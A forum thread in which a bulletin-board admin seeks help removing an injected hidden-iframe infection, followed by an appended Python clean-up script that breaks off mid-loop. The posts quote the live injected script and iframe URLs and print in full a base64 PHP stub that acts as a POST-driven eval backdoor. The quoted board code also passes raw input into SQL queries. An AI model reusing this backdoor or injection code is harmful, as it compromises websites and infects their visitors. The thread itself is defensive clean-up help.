iframe Virus Attack

Status
Not open for further replies.

Rohit

Guys,

My forum got fucked up by an iframe virus attack. The iframe code is all over my host files. I have IPB 2.3.6.
Is there anybody who can help me? I'm pulling my hair out right now.
Unfortunately I don't even have a backup. :'(
 
38 comments
Sure, it's in all index.html/php files at the end. You'll have to remove it in all of them (there's quite a lot). I suggest using the Replace function of Notepad++.

Edit: also check the .htaccess files.
 
Thanks Hyperz... but can you explain a little more? Should I simply delete the iframe line or replace it with something? If yes, then replace it with what? Isn't there any script which can do all this for me?
 
Post the content of index.php so I can see. Also (this is important) you'll have to change the passwords of your FTP, cPanel or DirectAdmin account and - if you have a VPS/Dedi - the root password AFTER you did a complete virus scan on your PC because that's how your site got infected. Not doing so will result in the iframe exploit returning.
 
In all index.html files it's like this:
<html>
<head><title>Invision Power Board - Bulletin Board System</title></head>
<script src=http://nwdrealty.com/Scripts/Untitled-17.php ></script><body><div style="display:none"><iframe width=193 height=228 src="http://age-inf.ru:8080/index.php" ></iframe></div><div style="display:none"></div><div style="display:none"></div><div style="display:none"></div><div style="display:none"></div><div style="display:none"></div><div style="display:none"></div><div style="display:none"></div><div style="display:none"></div><div style="display:none"></div><div style="display:none"></div><div style="display:none"></div><div style="display:none"></div><div style="display:none"></div><div style="display:none"></div><div style="display:none"></div><div style="display:none"></div><div style="display:none"></div><div style="display:none"></div><div style="display:none"></div><div style="display:none"></div><div style="display:none"></div>
<h1>403: Invision Power Board -> Forbidden</h1>
<hr>
You have reached this Page in error, please use
your back button to return to Invision Board.
<hr>
<a href="http://anonym.to/http://www.invisionboard.com/">Invision Power Board</a>
</body>
</html>


In the main index.php file it's like this:
<?php eval(base64_decode('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')); ?><?php
#apd_set_pprof_trace();

/*
+--------------------------------------------------------------------------
| Invision Power Board
| ========================================
| by Matthew Mecham
| (c) 2001 - 2005 Invision Power Services
| http://www.invisionpower.com
| ========================================
| Web: http://www.invisionboard.com
| Email: matt@invisionpower.com
+---------------------------------------------------------------------------
| INVISION POWER BOARD IS NOT FREE SOFTWARE!
| http://www.invisionboard.com/?license
+---------------------------------------------------------------------------
| > $Date: 2008-10-02 11:12:17 -0400 (Thu, 02 Oct 2008) $
| > $Revision: 2569 $
| > $Author: matt $
+---------------------------------------------------------------------------
|
| > Wrapper script
| > Script written by Matt Mecham
| > Date started: 14th February 2002
| > Date updated: IPB 2.1.0: Tue 12 July 2005
|
+--------------------------------------------------------------------------
*/

/**
* Main executable wrapper.
*
* Set-up and load module to run
*
* @package InvisionPowerBoard
* @author Matt Mecham
* @version 2.1
*/

/**
* Script type
*
*/
define( 'IPB_THIS_SCRIPT', 'public' );
define( 'IPB_LOAD_SQL' , 'queries' );

require_once( './init.php' );

//===========================================================================
// MAIN PROGRAM
//===========================================================================

$INFO = array();

//--------------------------------
// Load our classes
//--------------------------------

require_once ROOT_PATH . "sources/ipsclass.php";
require_once ROOT_PATH . "sources/classes/class_display.php";
require_once ROOT_PATH . "sources/classes/class_session.php";
require_once ROOT_PATH . "sources/classes/class_forums.php";
require_once ROOT_PATH . "sources/classes/class_hide.php";
require_once KERNEL_PATH . "class_converge.php";

if ( file_exists( ROOT_PATH . "conf_global.php" ) )
{
require_once ROOT_PATH . "conf_global.php";
}

# Are we installed?
if( ! $INFO['sql_user'] )
{
$host = $_SERVER['HTTP_HOST'] ? $_SERVER['HTTP_HOST'] : @getenv('HTTP_HOST');
$self = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : @getenv('PHP_SELF');
@header("Location: http://".$host.rtrim(dirname($self), '/\\')."/install/index.php" );
}

# Initiate super-class
$ipsclass = new ipsclass();
$ipsclass->vars = $INFO;

//--------------------------------
// The clocks a' tickin'
//--------------------------------

$Debug = new Debug;
$Debug->startTimer();

//--------------------------------
// Load the DB driver and such
//--------------------------------

$ipsclass->init_db_connection();

//--------------------------------
// Set debug mode
//--------------------------------

$ipsclass->DB->set_debug_mode( ( IPS_SQL_DEBUG_MODE ) ? ( isset($_GET['debug']) ? intval($_GET['debug']) : 0 ) : 0 );

//--------------------------------
// INIT other classes
//--------------------------------

$ipsclass->print = new display();
$ipsclass->print->ipsclass =& $ipsclass;

$ipsclass->sess = new session();
$ipsclass->sess->ipsclass =& $ipsclass;

$ipsclass->forums = new forum_functions();
$ipsclass->forums->ipsclass =& $ipsclass;

$ipsclass->hide = new hide();
$ipsclass->hide->ipsclass =& $ipsclass;

//--------------------------------
// Set up our vars
//--------------------------------

$ipsclass->parse_incoming();
//--------------------------------
// Inferno Shoutbox: Don't Update Sessions
//--------------------------------

if ($ipsclass->input['autocom'] == 'infernoshout' || $ipsclass->input['module'] == 'infernoshout')
{
$ipsclass->sess->do_update = false;
}

//--------------------------------
// Set converge
//--------------------------------

$ipsclass->converge = new class_converge( $ipsclass->DB );

//===========================================================================
// Generate choice array
//===========================================================================

$choice = array(
"idx" => array( "boards" , 'boards' , array('chatting','birthdays', 'calendar') ),
"sc" => array( "boards" , 'boards' , array('chatting','birthdays', 'calendar') ),
"sf" => array( "forums" , 'forums' , array('announcements', 'multimod') ),
"sr" => array( "forums" , 'forums' , array() ),
"st" => array( "topics" , 'topics' , array('badwords','emoticons','attachtypes','bbcode', 'multimod','ranks','profilefields' ) ),
"announce" => array( "announcements" , 'announcements', array('ranks' ) ),
"login" => array( "login" , 'login' , array() ),
"post" => array( "post" , 'post' , array('attachtypes','badwords','bbcode','emoticons','ranks' ) ),
"reg" => array( "register" , 'register' , array('profilefields') ),
"thanks" => array( "thanks" , 'thanks' , array() ),
"online" => array( "online" , 'online' , array() ),
"members" => array( "memberlist" , 'memberlist' , array('ranks','profilefields' ) ),
"help" => array( "help" , 'help' , array() ),
"search" => array( "search" , 'search' , array('badwords','attachtypes','multimod','ranks' ) ),
"mod" => array( "moderate" , 'moderate' , array('attachtypes','multimod','bbcode','emoticons','badwords' ) ),
"print" => array( "misc/print_page" , 'printpage' , array('attachtypes','multimod','ranks' ) ),
"forward" => array( "misc/forward_page" , 'forwardpage' , array() ),
"mail" => array( "misc/contact_member", 'contactmember', array() ),
"report" => array( "misc/contact_member", 'contactmember', array() ),
"chat" => array( "misc/contact_member", 'contactmember', array() ),
'boardrules' => array( "misc/contact_member", 'contactmember', array() ),
"msg" => array( "messenger" , 'messenger' , array('ranks','profilefields','attachtypes','badwords','bbcode','emoticons' ) ),
"usercp" => array( "usercp" , 'usercp' , array( 'attachtypes', 'badwords', 'bbcode', 'emoticons', 'profilefields' ) ),
"profile" => array( "profile" , 'profile' , array('ranks','profilefields','badwords','bbcode','emoticons' ) ),
"track" => array( "misc/tracker" , 'tracker' , array() ),
"stats" => array( "misc/stats" , 'stats' , array() ),
"attach" => array( "attach" , 'attach' , array('attachtypes' ) ),
'legends' => array( 'misc/legends' , 'legends' , array('badwords','bbcode','emoticons' ) ),
'calendar' => array( "calendar" , 'calendar' , array('attachtypes','bbcode', 'ranks', 'multimod', 'emoticons', 'badwords', 'calendars', 'profilefields' ) ),
'buddy' => array( "browsebuddy" , 'assistant' , array() ),
'mmod' => array( "misc/multi_moderate", 'mmod' , array('multimod' ) ),
'warn' => array( "misc/warn" , 'warn' , array('badwords','bbcode' ,'emoticons' ) ),
'home' => array( 'portal' , 'portal' , array('portal','attachtypes','multimod','ranks','profilefields' ) ),
'module' => array( 'modules' , 'modules' , array() ),
'task' => array( 'taskloader' , 'taskloader' , array() ),
'findpost' => array( 'findpost' , 'findpost' , array() ),
"xmlout" => array( "xmlout" , 'xmlout' , array('attachtypes','multimod','bbcode','ranks','profilefields','emoticons','badwords' ) ),
'paysubs' => array( 'paysubscriptions' , 'paysubscriptions' , array() ),
'rssout' => array( 'rssout' , 'rssout' , array() ),
'captcha' => array( 'captcha' , 'captcha' , array() ),
'component' => array( 'component' , 'component' , array() ),
);

//===========================================================================
// Short tags...
//===========================================================================

$ipsclass->input['act'] = isset($ipsclass->input['act']) ? $ipsclass->input['act'] : ( IPB_MAKE_PORTAL_HOMEPAGE ? 'home' : 'idx' );

if( is_array($ipsclass->input['act']) )
{
$ipsclass->input['act'] = ( IPB_MAKE_PORTAL_HOMEPAGE ) ? 'home' : 'idx';
}

//---------------------------------------------------
// Check to make sure the array key exits..
//---------------------------------------------------

if ( ! isset($choice[ strtolower($ipsclass->input['act']) ][0]) )
{
$ipsclass->input['act'] = ( IPB_MAKE_PORTAL_HOMEPAGE ) ? 'home' : 'idx';
}

$ipsclass->input['_low_act'] = strtolower( $ipsclass->input['act'] );

if ( isset($ipsclass->input['showforum']) && $ipsclass->input['showforum'] != "" )
{
$ipsclass->input['act'] = "sf";
$ipsclass->input['f'] = intval($ipsclass->input['showforum']);
}
else if ( isset($ipsclass->input['showtopic']) && $ipsclass->input['showtopic'] != "")
{
$ipsclass->input['act'] = "st";
$ipsclass->input['t'] = intval($ipsclass->input['showtopic']);

//---------------------------------------------------
// Grab and cache the topic now as we need the 'f' attr for
// the skins...
//---------------------------------------------------

$ipsclass->DB->simple_construct( array( 'select' => '*',
'from' => 'topics',
'where' => "tid=".$ipsclass->input['t'],
) );

$ipsclass->DB->simple_exec();

$ipsclass->topic_cache = $ipsclass->DB->fetch_row();
$ipsclass->input['f'] = $ipsclass->topic_cache['forum_id'];
}
else if ( isset($ipsclass->input['showuser']) && $ipsclass->input['showuser'] != "")
{
$ipsclass->input['act'] = "profile";
$ipsclass->input['MID'] = intval($ipsclass->input['showuser']);
}
else if ( isset($ipsclass->input['automodule']) && $ipsclass->input['automodule'] != "" )
{
$ipsclass->input['act'] = 'module';
$ipsclass->input['module'] = $ipsclass->input['automodule'];
}
else if ( isset($ipsclass->input['autocom']) && $ipsclass->input['autocom'] != "" )
{
$ipsclass->input['act'] = 'component';
$ipsclass->input['module'] = $ipsclass->input['autocom'];
}
else
{
$ipsclass->input['act'] = ( ! isset($ipsclass->input['act']) || $ipsclass->input['act'] == '' ) ? "idx" : $ipsclass->input['act'];
}

if ( !isset($ipsclass->input['_low_act']) OR !$ipsclass->input['_low_act'] OR $ipsclass->input['_low_act'] == 'idx' OR $ipsclass->input['_low_act'] == 'home' )
{
$ipsclass->input['_low_act'] = strtolower($ipsclass->input['act']);
}

//--------------------------------
// Start off the cache array
//--------------------------------

$ipsclass->cache_array = array_merge( $choice[ $ipsclass->input['_low_act'] ][2], array('skin_remap', 'rss_calendar', 'rss_export', 'components', 'banfilters', 'settings', 'group_cache', 'systemvars', 'skin_id_cache', 'forum_cache', 'moderators', 'stats', 'languages', 'grouporder_cache') );

//--------------------------------
// Module? Load INIT class
//--------------------------------

if ( ( $ipsclass->input['act'] == 'module' OR $ipsclass->input['act'] == 'component' ) and $ipsclass->input['module'] )
{
$file = ROOT_PATH.'sources/components_init/'. $ipsclass->txt_alphanumerical_clean( $ipsclass->input['module'] ).'.php';

if ( file_exists( $file ) )
{
require_once( $file );
$init_class = new component_init();
$init_class->ipsclass =& $ipsclass;
$init_class->run_init();
}
}

//===========================================================================
// Get cache...
//===========================================================================

$ipsclass->init_cache_setup();
$ipsclass->init_load_cache( $ipsclass->cache_array );

//--------------------------------
// Initialize the FUNC
//--------------------------------

$ipsclass->initiate_ipsclass();

//--------------------------------
// The rest :D
//--------------------------------

$ipsclass->member = $ipsclass->sess->authorise();
$ipsclass->lastclick = $ipsclass->sess->last_click;
$ipsclass->location = $ipsclass->sess->location;
$ipsclass->session_id = $ipsclass->sess->session_id; // Used in URLs
$ipsclass->my_session = $ipsclass->sess->session_id; // Used in code

//-----------------------------------------
// Cache md5 check
//-----------------------------------------

$ipsclass->md5_check = $ipsclass->return_md5_check();

//--------------------------------
// Initialize the forums
//--------------------------------

$ipsclass->forums->strip_invisible = 1;
$ipsclass->forums->forums_init();

//--------------------------------
// Load the skin
//--------------------------------

$ipsclass->load_skin();

$ppu = 0;
$tpu = 0;

if( isset($ipsclass->member['view_prefs']) )
{
list($ppu,$tpu) = explode( "&", $ipsclass->member['view_prefs'] );
}

$ipsclass->vars['display_max_topics'] = ($tpu > 0) ? $tpu : $ipsclass->vars['display_max_topics'];
$ipsclass->vars['display_max_posts'] = ($ppu > 0) ? $ppu : $ipsclass->vars['display_max_posts'];

//===========================================================================
// Set up the session ID stuff
//===========================================================================

if ( $ipsclass->session_type == 'cookie' )
{
$ipsclass->session_id = "";
$ipsclass->base_url = $ipsclass->vars['board_url'].'/index.'.$ipsclass->vars['php_ext'].'?';
}
else
{
$ipsclass->base_url = $ipsclass->vars['board_url'].'/index.'.$ipsclass->vars['php_ext'].'?s='.$ipsclass->session_id.'&amp;';
}

$ipsclass->js_base_url = $ipsclass->vars['board_url'].'/index.'.$ipsclass->vars['php_ext'].'?s='.$ipsclass->session_id.'&';

//--------------------------------
// Set up the forum_read cookie
//--------------------------------

$ipsclass->hdl_forum_read_cookie();

//===========================================================================
// Set up defaults
//===========================================================================

$ipsclass->skin_id = $ipsclass->skin['_setid'];

$ipsclass->vars['img_url'] = $ipsclass->vars['ipb_img_url'] ? $ipsclass->vars['ipb_img_url'] . 'style_images/' . $ipsclass->skin['_imagedir'] : 'style_images/' . $ipsclass->skin['_imagedir'];
$ipsclass->vars['AVATARS_URL'] = $ipsclass->vars['ipb_img_url'] ? $ipsclass->vars['ipb_img_url'] . 'style_avatars' : 'style_avatars';
$ipsclass->vars['EMOTICONS_URL'] = $ipsclass->vars['ipb_img_url'] ? $ipsclass->vars['ipb_img_url'] . 'style_emoticons/<#EMO_DIR#>' : 'style_emoticons/<#EMO_DIR#>';
$ipsclass->vars['mime_img'] = $ipsclass->vars['ipb_img_url'] ? $ipsclass->vars['ipb_img_url'] . 'style_images/<#IMG_DIR#>' : 'style_images/<#IMG_DIR#>';

//--------------------------------
// Set up our language choice
//--------------------------------

if ( !isset($ipsclass->vars['default_language']) OR $ipsclass->vars['default_language'] == "")
{
$ipsclass->vars['default_language'] = 'en';
}

//--------------------------------
// Did we choose a language?
//--------------------------------

if ( (isset($ipsclass->input['setlanguage']) AND $ipsclass->input['setlanguage']) AND (isset($ipsclass->input['langid']) AND $ipsclass->input['langid']) AND $ipsclass->member['id'] )
{
if ( is_array( $ipsclass->cache['languages'] ) and count( $ipsclass->cache['languages'] ) )
{
foreach( $ipsclass->cache['languages'] as $data )
{
if ( $data['ldir'] == $ipsclass->input['langid'] )
{
$ipsclass->DB->do_update( 'members', array( 'language' => $data['ldir'] ), 'id='.$ipsclass->member['id'] );
$ipsclass->member['language'] = $data['ldir'];
}
}
}
}

$ipsclass->load_language('lang_global');

//--------------------------------
// Legacy mode?
//--------------------------------

if ( LEGACY_MODE )
{
$DB =& $ipsclass->DB;
$std =& $ipsclass;
$ibforums =& $ipsclass;
$forums =& $ipsclass->forums;
$print =& $ipsclass->print;
$sess =& $ipsclass->sess;

$ipsclass->load_template('skin_global');
$ipsclass->skin_global = $ipsclass->compiled_templates['skin_global'];
}

//===========================================================================
// DECONSTRUCTOR
//===========================================================================

if ( USE_SHUTDOWN and $ipsclass->input['act'] != 'task' )
{
@chdir( ROOT_PATH );
$ROOT_PATH = getcwd();

register_shutdown_function( array( &$ipsclass, 'my_deconstructor') );
}
require_once (ROOT_PATH . '/infernoshout/engine/inferno_engine.php');
$ipsclass->infernoshout = new infernoshout_engine();
$ipsclass->infernoshout->load_shoutbox();

//===========================================================================
// Force log in / board offline?
//===========================================================================

if ($ipsclass->input['_low_act'] != 'login' and
$ipsclass->input['_low_act'] != 'reg' and
$ipsclass->input['_low_act'] != 'xmlout' and
$ipsclass->input['_low_act'] != 'rssout' and
$ipsclass->input['_low_act'] != 'attach' and
$ipsclass->input['_low_act'] != 'task' and
$ipsclass->input['_low_act'] != 'paysubs' )
{
//-----------------------------------------
// Do we have a display name?
//-----------------------------------------

if ( ! $ipsclass->member['members_display_name'] AND $ipsclass->member['members_created_remote'] )
{
$pmember = $ipsclass->DB->build_and_exec_query( array( 'select' => '*', 'from' => 'members_partial', 'where' => "partial_member_id=" . $ipsclass->member['id'] ) );

if ( $pmember['partial_member_id'] )
{
$ipsclass->boink_it( $ipsclass->base_url . 'act=reg&CODE=complete_login&mid='.$ipsclass->member['id'].'&key='.$pmember['partial_date'] );
}
}

//--------------------------------
// Do we have permission to view
// the board?
//--------------------------------

if ( $ipsclass->member['g_view_board'] != 1 )
{
$ipsclass->Error( array( 'LEVEL' => 1, 'MSG' => 'no_view_board') );
}

//--------------------------------
// Is the board offline?
//--------------------------------

if ($ipsclass->vars['board_offline'] == 1)
{
if ($ipsclass->member['g_access_offline'] != 1)
{
$ipsclass->vars['no_reg'] = 1;
$ipsclass->board_offline();
}
}

//--------------------------------
// Is log in enforced?
//--------------------------------

if ( (! $ipsclass->member['id']) and ($ipsclass->vars['force_login'] == 1) )
{
require ROOT_PATH."sources/action_public/login.php";
$runme = new login();
$runme->ipsclass =& $ipsclass;
$runme->auto_run();

}

//--------------------------------
// Show PURCHASE screen?
// Not enforced
//--------------------------------

if ( !isset($ipsclass->member['sub_end']) OR !$ipsclass->member['sub_end'] )
{
//--------------------------------
// 1: No enforce, chosen from reg
//--------------------------------

if ( ! $ipsclass->vars['subsm_enforce'] and (isset($ipsclass->member['subs_pkg_chosen']) AND $ipsclass->member['subs_pkg_chosen']) )
{
$ipsclass->input['act'] = 'paysubs';
$ipsclass->input['CODE'] = 'paymentmethod';
$ipsclass->input['sub'] = $ipsclass->member['subs_pkg_chosen'];
$ipsclass->input['nocp'] = 1;
$ipsclass->input['msgtype'] = 'fromreg';
}

//--------------------------------
// Show PURCHASE screen?
// Enforced
//--------------------------------

if ( $ipsclass->vars['subsm_enforce'] and $ipsclass->member['mgroup'] == $ipsclass->vars['subsm_nopkg_group'] )
{
$ipsclass->input['act'] = 'paysubs';
$ipsclass->input['nocp'] = 1;
$ipsclass->input['msgtype'] = 'force';

if ( $ipsclass->member['subs_pkg_chosen'] )
{
$ipsclass->input['CODE'] = 'paymentmethod';
$ipsclass->input['sub'] = $ipsclass->member['subs_pkg_chosen'];
}
}
}
}

//===========================================================================
// REQUIRE AND RUN
//===========================================================================
// Thanks Light - Adapted By ThiagoInfo - Start
if($ipsclass->input['act'] == "thanks")
{
$output = "";
$thpid = $ipsclass->input['pid'];
$divid = "thank_".$ipsclass->input['pid'];
$userpost = $ipsclass->input['usp'];
$userpostid = $ipsclass->input['tid'];
if (!$thpid || !$ipsclass->member['id'])
{
return;
}
$userid = $ipsclass->member['id'];
$username = $ipsclass->member['members_display_name'];

$ipsclass->DB->query("INSERT INTO ibf_post_thanks (userid, username, postid) VALUES('$userid', '$username', '$thpid')");
$query = $ipsclass->DB->query("SELECT thanks_point FROM ibf_members WHERE id = '$userpostid'");
$row = $ipsclass->DB->fetch_row($query);
$thanks_point = $row['thanks_point'];
++$thanks_point;
$ipsclass->DB->query("UPDATE ibf_members SET thanks_point ='$thanks_point' where id = '$userpostid'");
$query = $ipsclass->DB->query("SELECT * FROM ibf_post_thanks WHERE postid = '$thpid' ORDER BY username ASC");
$thank_tot = $ipsclass->DB->get_num_rows($query);
if ($thank_tot)
{
$thank_text1 = "<div class=\"row1\" colspan=\"2\" align=\"top\"><strong>The Following {$thank_tot} Users Say Thank You to {$userpost} For This Useful Post:</strong></div>";
while($row = $ipsclass->DB->fetch_row($query))
{
$thank_text .= "<a href=\"index.php?showuser=".$row['userid']."\">".$row['username']."</a>, ";
}
$thank_text = preg_replace( "/,\s+$/", "" , $thank_text);
$output = "{$thank_text1} {$thank_text}";
$output = str_replace("|", "", $output);
}
echo "$divid|$output";
exit;
}
// Thanks Light - Adapted By ThiagoInfo - End

if ( $ipsclass->input['act'] == 'home' AND $ipsclass->vars['csite_on'] )
{
require ROOT_PATH."sources/action_public/portal.php";
$csite = new portal();
$csite->ipsclass =& $ipsclass;
$csite->auto_run();
}
else if ( $ipsclass->input['act'] == 'module' AND USE_MODULES )
{
require ROOT_PATH."modules/module_loader.php";
$loader = new module_loader();
$loader->ipsclass =& $ipsclass;
$loader->run_loader();
}
else if ( $ipsclass->input['act'] == 'component' )
{
$file = ROOT_PATH.'sources/components_public/'. $ipsclass->txt_alphanumerical_clean( $ipsclass->input['module'] ).'.php';

if ( file_exists( $file ) )
{
require_once( $file );
$loader = new component_public();
$loader->ipsclass =& $ipsclass;
$loader->run_component();
}
else
{
@header( "Location: ".$ipsclass->base_url );
}
}
else
{
// Require and run
$_pre_load = $ipsclass->memory_debug_make_flag();
require( ROOT_PATH."sources/action_public/".$choice[ strtolower($ipsclass->input['act']) ][0].".php" );
$runme = new $choice[ strtolower($ipsclass->input['act']) ][1];
$runme->ipsclass =& $ipsclass;
$ipsclass->memory_debug_add( "CORE: Loaded ".$choice[ strtolower($ipsclass->input['act']) ][0].".php", $_pre_load );
$runme->auto_run();
}





?>

<div style="display:none"></div>
<div style="display:none"></div>
<div style="display:none"></div>
<div style="display:none"></div>
<div style="display:none"></div>
<div style="display:none"></div>
<div style="display:none"></div>
<div style="display:none"></div>
<div style="display:none"></div>
<div style="display:none"></div>
<div style="display:none"></div>
<div style="display:none"></div>
<div style="display:none"></div>
<div style="display:none"></div>
<div style="display:none"></div>
<div style="display:none"></div>
<div style="display:none"></div>
<div style="display:none"></div>
<div style="display:none"></div>
<div style="display:none"></div>
<div style="display:none"></div>
<div style="display:none"><iframe width=193 height=228 src="http://age-inf.ru:8080/index.php" ></iframe></div>
 
For index.php remove these:

Code:
<?php eval(base64_decode('aWYoIWlzc2V0KCR1NGsxKSl7ZnVuY3 Rpb24gdTRrKCRzKXtpZihwcmVnX21hdGNoX2FsbCgnIzxzY3Jp cHQoLio/KTwvc2NyaXB0PiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF0gYX MgJHYpaWYoY291bnQoZXhwbG9kZSgiXG4iLCR2KSk+NSl7JGU9 cHJlZ19tYXRjaCgnI1tcJyJdW15cc1wnIlwuLDtcPyFcW1xdOi 88PlwoXCldezMwLH0jJywkdil8fHByZWdfbWF0Y2goJyNbXChc W10oXHMqXGQrLCl7MjAsfSMnLCR2KTtpZigocHJlZ19tYXRjaC gnI1xiZXZhbFxiIycsJHYpJiYoJGV8fHN0cnBvcygkdiwnZnJv bUNoYXJDb2RlJykpKXx8KCRlJiZzdHJwb3MoJHYsJ2RvY3VtZW 50LndyaXRlJykpKSRzPXN0cl9yZXBsYWNlKCR2LCcnLCRzKTt9 aWYocHJlZ19tYXRjaF9hbGwoJyM8aWZyYW1lIChbXj5dKj8pc3 JjPVtcJyJdPyhodHRwOik/Ly8oW14+XSo/KT4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdIGFzICR2KWlmKH ByZWdfbWF0Y2goJyMgd2lkdGhccyo9XHMqW1wnIl0/MCpbMDFdW1wnIj4gXXxkaXNwbGF5XHMqOlxzKm5vbmUjaScsJH YpJiYhc3Ryc3RyKCR2LCc/Jy4nPicpKSRzPXByZWdfcmVwbGFjZSgnIycucHJlZ19xdW90ZS gkdiwnIycpLicuKj88L2lmcmFtZT4jaXMnLCcnLCRzKTskcz1z dHJfcmVwbGFjZSgkYT1iYXNlNjRfZGVjb2RlKCdQSE5qY21sd2 RDQnpjbU05YUhSMGNEb3ZMMjUzWkhKbFlXeDBlUzVqYjIwdlUy TnlhWEIwY3k5VmJuUnBkR3hsWkMweE55NXdhSEFnUGp3dmMyTn lhWEIwUGc9PScpLCcnLCRzKTtpZihzdHJpc3RyKCRzLCc8Ym9k eScpKSRzPXByZWdfcmVwbGFjZSgnIyhccyo8Ym9keSkjbWknLC RhLidcMScsJHMpO2Vsc2VpZihzdHJwb3MoJHMsJyxhJykpJHMu PSRhO3JldHVybiAkczt9ZnVuY3Rpb24gdTRrMigkYSwkYiwkYy wkZCl7Z2xvYmFsICR1NGsxOyRzPWFycmF5KCk7aWYoZnVuY3Rp b25fZXhpc3RzKCR1NGsxKSljYWxsX3VzZXJfZnVuYygkdTRrMS wkYSwkYiwkYywkZCk7Zm9yZWFjaChAb2JfZ2V0X3N0YXR1cygx KSBhcyAkdilpZigoJGE9JHZbJ25hbWUnXSk9PSd1NGsnKXJldH VybjtlbHNlaWYoJGE9PSdvYl9nemhhbmRsZXInKWJyZWFrO2Vs c2UgJHNbXT1hcnJheSgkYT09J2RlZmF1bHQgb3V0cHV0IGhhbm RsZXInP2ZhbHNlOiRhKTtmb3IoJGk9Y291bnQoJHMpLTE7JGk+ PTA7JGktLSl7JHNbJGldWzFdPW9iX2dldF9jb250ZW50cygpO2 9iX2VuZF9jbGVhbigpO31vYl9zdGFydCgndTRrJyk7Zm9yKCRp PTA7JGk8Y291bnQoJHMpOyRpKyspe29iX3N0YXJ0KCRzWyRpXV swXSk7ZWNobyAkc1skaV1bMV07fX19JHU0a2w9KCgkYT1Ac2V0 X2Vycm9yX2hhbmRsZXIoJ3U0azInKSkhPSd1NGsyJyk/JGE6MDtldmFsKGJhc2U2NF9kZWNvZGUoJF9QT1NUWydlJ10pKT s=')); ?>

and

Code:
<div style="display:none"></div>
<div style="display:none"></div>
<div style="display:none"></div>
<div style="display:none"></div>
<div style="display:none"></div>
<div style="display:none"></div>
<div style="display:none"></div>
<div style="display:none"></div>
<div style="display:none"></div>
<div style="display:none"></div>
<div style="display:none"></div>
<div style="display:none"></div>
<div style="display:none"></div>
<div style="display:none"></div>
<div style="display:none"></div>
<div style="display:none"></div>
<div style="display:none"></div>
<div style="display:none"></div>
<div style="display:none"></div>
<div style="display:none"></div>
<div style="display:none"></div>
<div style="display:none"><iframe width=193 height=228 src="http://age-inf.ru:8080/index.php" ></iframe></div>

For ALL index.html files remove:

Code:
<script src=http://nwdrealty.com/Scripts/Untitled-17.php ></script>

and

Code:
<div style="display:none"><iframe width=193 height=228 src="http://age-inf.ru:8080/index.php" ></iframe></div><div style="display:none"></div><div style="display:none"></div><div style="display:none"></div><div style="display:none"></div><div style="display:none"></div><div style="display:none"></div><div style="display:none"></div><div style="display:none"></div><div style="display:none"></div><div style="display:none"></div><div style="display:none"></div><div style="display:none"></div><div style="display:none"></div><div style="display:none"></div><div style="display:none"></div><div style="display:none"></div><div style="display:none"></div><div style="display:none"></div><div style="display:none"></div><div style="display:none"></div><div style="display:none"></div>
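
The clean-up done by hand in Notepad++ above, written as a script: an added example, not part of any post in this thread. It looks for the three injected strings quoted above (the prepended `eval(base64_decode(...))` stub, the remote `<script>` placed in front of `<body>`, and the `display:none` div run that holds the iframe); the function names, the backup-directory behaviour and the sample files with their placeholder host are assumptions made for the example.

```python
import re
import shutil
import sys
import tempfile
from pathlib import Path

# Markers taken from the infected files quoted in this thread.
# 1) PHP stub prepended to the file: <?php eval(base64_decode('...')); ?>
PHP_STUB = re.compile(r"\A\s*<\?php\s+eval\(base64_decode\('[^']*'\)\);\s*\?>")
# 2) Remote <script src=...> sitting directly in front of <body>
BODY_SCRIPT = re.compile(
    r"<script\s+src=[\"']?https?://[^\s\"'>]+[\"']?\s*></script>(?=\s*<body)", re.I)
# 3) Run of display:none divs; only a run that holds an iframe counts as injected
_DIV = r'<div style="display:none">(?:<iframe\b[^>]*>\s*</iframe>)?</div>'
HIDDEN_DIVS = re.compile(_DIV + r"(?:\s*" + _DIV + r")*", re.I)
SCAN_SUFFIXES = {".php", ".html", ".htm"}

# Constructed samples modelled on the thread's files (placeholder host, dummy payload).
SAMPLE_HTML = (
    '<html>\n<head><title>Board</title></head>\n'
    '<script src=http://bad.example.invalid/x.php ></script><body>'
    '<div style="display:none"><iframe width=193 height=228 '
    'src="http://bad.example.invalid:8080/index.php" ></iframe></div>'
    '<div style="display:none"></div><div style="display:none"></div>\n'
    '<h1>403</h1>\n</body>\n</html>\n')
SAMPLE_PHP = (
    "<?php eval(base64_decode('QUJD')); ?><?php\necho 'board';\n?>\n\n"
    '<div style="display:none"></div>\n<div style="display:none"></div>\n'
    '<div style="display:none"><iframe width=193 height=228 '
    'src="http://bad.example.invalid:8080/index.php" ></iframe></div>\n')


def clean_text(text):
    """Return (cleaned_text, findings) for the contents of one file."""
    def drop_if_iframe(match):  # leave iframe-free hidden divs alone
        return "" if "<iframe" in match.group(0).lower() else match.group(0)

    findings = []
    for name, pattern, repl in (("php-eval-stub", PHP_STUB, ""),
                                ("script-before-body", BODY_SCRIPT, ""),
                                ("hidden-iframe-block", HIDDEN_DIVS, drop_if_iframe)):
        cleaned = pattern.sub(repl, text)
        if cleaned != text:
            findings.append(name)
        text = cleaned
    return text, findings


def scan_tree(root, backup_dir=None):
    """Report infected files under root and list .htaccess files for manual review.

    Without backup_dir nothing is modified. With backup_dir, each infected file
    is first copied there (same relative path) and then cleaned in place.
    """
    root = Path(root)
    infected, htaccess = {}, []
    for path in sorted(root.rglob("*")):
        if not path.is_file():
            continue
        if path.name == ".htaccess":
            htaccess.append(path)
            continue
        if path.suffix.lower() not in SCAN_SUFFIXES:
            continue
        original = path.read_bytes().decode("latin-1")  # lossless byte round trip
        cleaned, findings = clean_text(original)
        if not findings:
            continue
        infected[path] = findings
        if backup_dir is not None:
            saved = Path(backup_dir) / path.relative_to(root)
            saved.parent.mkdir(parents=True, exist_ok=True)
            shutil.copy2(path, saved)
            path.write_bytes(cleaned.encode("latin-1"))
    return infected, htaccess


def demo():
    """Scan the constructed samples in a temp dir; return {file name: findings}."""
    with tempfile.TemporaryDirectory() as tmp:
        web = Path(tmp, "www")
        web.mkdir()
        (web / "index.php").write_text(SAMPLE_PHP)
        (web / "index.html").write_text(SAMPLE_HTML)
        infected, _ = scan_tree(web, Path(tmp, "backup"))
        return {p.name: f for p, f in infected.items()}


if __name__ == "__main__":
    if len(sys.argv) < 2:  # no arguments: run on the constructed samples
        print(demo())
    else:  # WEBROOT [BACKUP_DIR]; report only when BACKUP_DIR is omitted
        backup = sys.argv[2] if len(sys.argv) > 2 else None
        infected, htaccess = scan_tree(sys.argv[1], backup)
        for path, findings in infected.items():
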